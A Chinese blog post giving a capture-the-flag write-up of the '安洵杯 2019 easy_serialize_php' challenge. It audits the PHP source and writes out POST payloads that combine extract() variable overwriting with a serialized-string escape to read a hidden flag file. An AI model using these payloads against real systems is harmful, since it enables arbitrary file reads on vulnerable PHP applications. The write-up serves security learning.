[安洵杯 2019]easy_serialize_php

已于 2023-02-02 14:36:31 修改
阅读量686 收藏
点赞数 1
分类专栏: CTF 文章标签: php web安全
于 2022-11-26 12:07:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46266259/article/details/128050228
版权

[安洵杯 2019]easy_serialize_php

在这里插入图片描述

本题考点:

  1. 反序列化的字符串逃逸(变少)
  2. extract()变量覆盖

思考过程:

  1. 首先代码审计可以看到几个关键点

    function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}
//这里是将敏感词替换为空,造成了字符减少,我们就有了字符串逃逸的操作空间

    $_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);
//extract()函数的变量覆盖,使得上面两个参数可控

    if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
//这里我们要么让guest_img.png逃逸,要么后面能消除sha1()函数的影响

    if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}
//file_get_contents()函数可以读取敏感文件
//$userinfo['img']只进行了base64解码,结合前面我们需要让guset_img.png逃逸
//继续跟进$userinfo['img']的入口,$userinfo = unserialize($serialize_info);  $serialize_info = filter(serialize($_SESSION));
//所以是$_SESSION序列化后被filter函数处理,再反序列化赋给userinfo,最后取出img这个键对应的值

  2. 我们目的是通过file_get_content()读取敏感文件,通过提示在phpinfo中发现可疑文件
    在这里插入图片描述

  3. 入口有了出口有了路径也有了,开始分析怎么一步一步过去

    首先康康反序列化结果长啥样吧

    <?php
$_SESSION["user"] = '*';
$_SESSION['function'] = '**';
$_SESSION['img'] = base64_encode('guest_img.png');
echo serialize($_SESSION);

//a:3:{s:4:"user";s:1:"*";s:8:"function";s:2:"**";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

  4. 因为我们要让guest_img.png逃逸换成,那我们function就应该为;s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";},让前面user的值被filter()函数替换掉,让";s:8:"function";s:40:这22个字符成为user的值,img成为一个键,但是本来是有三个键,因此我们这里还需要自己写一个键,最终结果为

    <?php
$_SESSION["user"] = 'phpphpphpflagphpphpphp';
$_SESSION['function'] = ';s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:1:"a";s:1:"a";}';
$_SESSION['img'] = base64_encode('guest_img.png');
echo serialize($_SESSION);

    a:3:{s:4:“user”;s:22:“phpphpphpflagphpphpphp”;s:8:“function”;s:56:“;s:3:“img”;s:20:“ZDBnM19mMWFnLnBocA==”;s:1:“a”;s:1:“a”;}”;s:3:“img”;s:20:“Z3Vlc3RfaW1nLnBuZw==”;}

    经过filter函数处理后
    a:3:{s:4:“user”;s:22:“";s:8:“function”;s:56:”;s:3:“img”;s:20:“ZDBnM19mMWFnLnBocA==”;s:1:“a”;s:1:“a”;}";s:3:“img”;s:20:“Z3Vlc3RfaW1nLnBuZw==”;}

  5. 那么POST传入参数
    _SESSION[user]=phpphpphpflagphpphpphp&_SESSION[function] =;s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:1:"a";s:1:"a";}

  6. 查看源码发现flag在/d0g3_fllllllag中,base64编码后再次传参读取即可
    _SESSION[user]=phpphpphpflagphpphpphp&_SESSION[function] =;s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";s:1:"a";s:1:"a";}

ph0ebus
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF:[安洵 2019]easy_serialize_php
末初的CSDN博客
03-03 942
https://buuoj.cn/challenges#[%E5%AE%89%E6%B4%B5%E6%9D%AF%202019]easy_serialize_php 访问/index.php?f=highlight_file得到源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'
BUUCTF [安洵 2019]easy_serialize_php
m0_62107966的博客
09-24 556
BUUCTF [安洵 2019]easy_serialize_phpphp反序列化时,当一整段内容反序列化结束后,后面的非法字符将会被忽略,而如何判断是否结束呢,可以看到,前面有一个a:3,表示序列化的内容是一个数组,有三个键,而以{作为序列化内容的起点,}作为序列化内容的终点。 所以此时后面的";s:3:"img";s:28:"L3VwbG9hZC9ndWVzdF9pbWcuanBn";}在反序列化时就会被当作非法字符忽略掉,导致我们可以控制$userinfo["img"]的值,达到任意文件读取的效
[wp][安洵 2019]easy_serialize_php
小飒的博客
07-05 109
[安洵 2019]easy_serialize_php f=phpinfo 得到 d0g3_f1ag.php ZDBnM19mMWFnLnBocA==在get ?f=show_image下 随便赋值 echo一下序列化 需要吞掉这一段 我一开始构造 _SESSION[1] =flagflagflagflagflagphp&_SESSION[function]=";s:3:“img”;s:20:“ZDBnM19mMWFnLnBocA==”;} 发现不行,对比网上别人的payload发现必须function这
mfc_Serialize.zip_CplusSerializeM_MFC Serialize socket_MFC seria
09-19
`serialize`函数有两个主要形式:`void Serialize(CArchive& ar)`和`virtual void Serialize(__out_ecount_part(nCount, *pCount) void* lpData, UINT nCount, CArchive& ar)`。前者用于常规的成员变量串行化,后者...
se_mouz_image.rar_serialize_序列化
09-23
PHP中,`serialize()`函数就是用来将变量转化为字符串,这样就可以方便地存储或者通过网络发送。在这个“se_mouz_image.rar_serialize_序列化”的主题中,我们将深入探讨如何利用`serialize()`函数来序列化文档...
jet_serialize:用于 Javascript 的扩展序列化程序
06-11
**jet_serialize: 用于JavaScript的扩展序列化程序** 在JavaScript编程中,数据的序列化是一个常见的需求,它涉及将对象转换为字符串以便存储或传输。`jet_serialize`库提供了一个强大的解决方案,允许开发者以更...
PHP中json_encode、json_decode与serialize、unserialize的性能测试分析
10-29
今天偶然在想,如果用PHP写一个类似BDB的基于文件的Key-Value小型数据库用于存储非结构化的记录型数据,不知道效率会如何?
grpc_serialize_example
02-14
grpc_serialize_example ex) protoc -I . proto/metric.proto --python_out=.ex) protoc -I . proto/metric.proto --go_out=.
BUUCTF [WUSTCTF2020]朴实无华
最新发布
weixin_73399382的博客
07-22 243
第一块就是intval函数的绕过,逻辑上是不存在小于2020又大于2021的数,但是php低版本好像是7点多和以下该函数对不同类型的数据处理有偏差,第二处则是md5函数绕过,
【Docker】Docker-compose 单机容器集群编排工具
F12138X的博客
07-18 1578
顽强的毅力可以征服世界上任何一座高峰
PHP项目开发流程概述
api77的博客
07-19 507
需求分析是项目开发的起始点,主要目的是明确项目的目标、功能需求、用户群体等。这一阶段通常通过用户访谈、市场调研、竞品分析等方式进行。
某企业网络及服务器规划与设计
cj13106811623的博客
07-22 786
在此次系统设计中,我们采用分层设计方法,将网络的逻辑结构化整为零,分层讨论设计与实现的细节问题。将网络拓扑结构划分为3个层次,即核心层、汇聚层和接入层。
Ubuntu 查询未更新的包 进行手动更新
小婷
07-19 178
lsb_release -a 查询ubuntu的版本号,我这边是20.04。apt list --upgradable 查询未更新的包。中间遇到输入选择,输入y即可。
深入理解Linux网络(一):内核如何接收网络包
又见南风的博客
07-18 881
在上⾯的代码中跟踪函数调⽤, __igb_open => igb_request_irq => igb_request_msix , 在 igb_request_msix 中我们看到了,对于多队列的⽹卡,为每⼀个队列都注册了中断,其对应的中断处理函数是 igb_msix_ring(该函数也在 drivers/net/ethernet/intel/igb/igb_main.c 下)。如协议注册⼩节看到 inet_protos 中保存着 tcp_v4_rcv() 和 udp_rcv() 的函数地址。
[web]-反序列化-绕过__wakeup(转)
mails2008的专栏
07-18 386
终点:很直接是echo $flag,在__destruct中,username==='admin' 和 password==100。反序列化过程中发现起点在终点之前调用,反而是捣乱的,那我们就不需要自动执行__wakeup,绕过的方法,设置的字段数量比实际字段大的值。其实简单的很简单,难得也很难,慢慢学习就好,没必要焦虑,觉得很难,纯粹一个兴趣爱好就行。起点:_wakeup函数中是$this->username='guest',是给赋值;按照常规思路,寻找起点、终点、跳板。
Linux(CentOS7)部署PHP-7.2.17源码包
thetender的博客
07-18 1100
LAMP系统安装 通过PHP的源码包部署PHP-7.2.17版本
LNMP环境配置问题整理
weixin_71113035的博客
07-18 350
LNMP环境配置问题整理
[安洵 2019]easy_serialize_php 1
03-16
$serialized = serialize($data); echo $serialized; ?> ``` 最终输出的序列化字符串为: ``` O:4:"User":2:{s:4:"name";s:5:"Alice";s:3:"age";i:20;} ``` 其中,`O:4:"User":2:` 表示这是一个类名为 `User` 的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值